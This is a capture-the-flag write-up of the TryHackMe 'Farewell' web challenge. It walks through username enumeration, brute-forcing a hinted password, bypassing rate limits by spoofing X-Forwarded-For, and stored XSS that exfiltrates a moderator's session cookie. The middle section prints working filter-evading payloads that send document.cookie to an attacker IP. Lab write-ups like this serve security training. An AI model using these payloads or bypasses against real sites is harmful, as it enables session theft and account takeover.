Introduction

Farewell — Premium Room is a web-based Capture The Flag (CTF) challenge on TryHackMe that demonstrates how multiple minor web vulnerabilities can be chained together to achieve full administrative compromise. The challenge involves enumerating valid users, abusing weak password hints, bypassing brute-force protections using client-controlled headers, and exploiting stored HTML/XSS injection within a moderation workflow. This write-up documents the complete attack path from initial enumeration to session hijacking and privilege escalation, highlighting common real-world web security misconfigurations and attacker techniques.

CTF Write-up

Enumeration — Login Page

On the login page, three potential usernames are disclosed:

• adam
• deliver11
• nora

These users appear to be valid accounts, making the login endpoint a good candidate for brute-force or logic-based attacks.

Password Hint Analysis

Viewing the response of login request in caido the response includes a password hint.

User: adam

Submitting adam as both username and password returns the following hint:

"favorite pet + 2"

I generated a wordlist of common pet names and appended `2` to each entry. However, none of the combinations worked for this user. User: nora

Password hint:

"lucky number 789"

This hint is too vague to reliably brute force without additional context, so I moved on.

User: deliver11

Password hint:

"Capital of Japan followed by 4 digits"

The capital of Japan is Tokyo, so the password format is:

Tokyo0000 → Tokyo9999

This makes the account ideal for a targeted brute-force attack.

Brute Forcing deliver11

I configured a brute-force attack using:

Password base: Tokyo Payload: 4-digit numeric suffix (0000–9999)

However, all attempts returned HTTP 403 Forbidden, indicating a firewall or rate-limiting mechanism.

Firewall Bypass — X-Forwarded-For

To bypass the restriction, I added the following header:

X-Forwarded-For: 127.0.0.X

The X-Forwarded-For (XFF) header is a standard HTTP header used to identify the originating IP address of a client connecting to a web server through a proxy server or load balancer.

I varied only the last octet of the IP address. Although these are not valid IPs, the application only checks for variation, not correctness — which is sufficient to bypass the firewall.

Successful Login

After re-running the brute-force attack with the modified header, the server response changed at payload 1011.

Upon closer inspection:

• Valid password: Tokyo1010
• Authentication succeeded despite the malformed IP.

I logged in as deliver11.

Post-Login Enumeration

After logging in, I noticed:

• A messaging system
• Messages marked as "Approved"
• A user role that appears to be moderated

This strongly suggests a stored XSS opportunity, where a moderator/admin views submitted messages.

Testing for XSS

NOTE: The moderator bot can occasionally fail due to previous payloads; restarting the machine may be necessary.

Initial tests showed that <script> tags are blocked:

<Script>console.log(1)</Script> threw 403 status code

So I switched to HTML-based injection.

HTML Injection via <iframe>

Payload used:

<iframe src='http://192.168.183.230' />

This successfully triggered a request to my Kali machine, confirming that HTML injection is allowed and executed in the moderator's browser.

Attempting JavaScript Execution

I tried triggering JavaScript using an `onerror` event:

<iframe src='http://192.168.183.230/something' onerror='fetch("http://192.168.183.230/fetch")' />

The request to '/something' returned 403, indicating that keywords like 'fetch' are blocked by a filter.

Filter Bypass — `eval()` + Event Handler

To bypass keyword filtering:

• Avoided `<script>`
• Avoided direct use of `fetch`
• Used **string concatenation**
• Used an **`img` tag with `onerror`**

Final Payload (Original) <img src='x' OnErRor=eval('fet'+'ch("http://192.168.183.230/"+docum'+'ent.coo'+'kie)') />

URL-Encoded Payload %3Cimg%20src%3D'x'%20OnErRor%3Deval('fet'%2B'ch("http%3A%2F%2F192.168.183.230%2F"%2Bdocum'%2B'ent.coo'%2B'kie)')%20%2F%3E

Cookie Theft

After submitting the payload, my Python HTTP server received a request containing the moderator's session cookie.

Ignore the other requests they were generated because testing payloads.

Privilege Escalation Steps:

1. Copy the stolen cookie
2. Replace your session cookie in the browser
3. Navigate to: /admin.php

This page is used for moderation and contains the admin flag.

Conclusion

Vulnerabilities Exploited

• Username enumeration
• Weak password hints
• Inadequate brute-force protection
• Improper trust in X-Forwarded-For
• Stored HTML injection
• Insufficient XSS filtering
• Session hijacking via XSS

This chain demonstrates how small misconfigurations, when combined, can lead to full administrative compromise.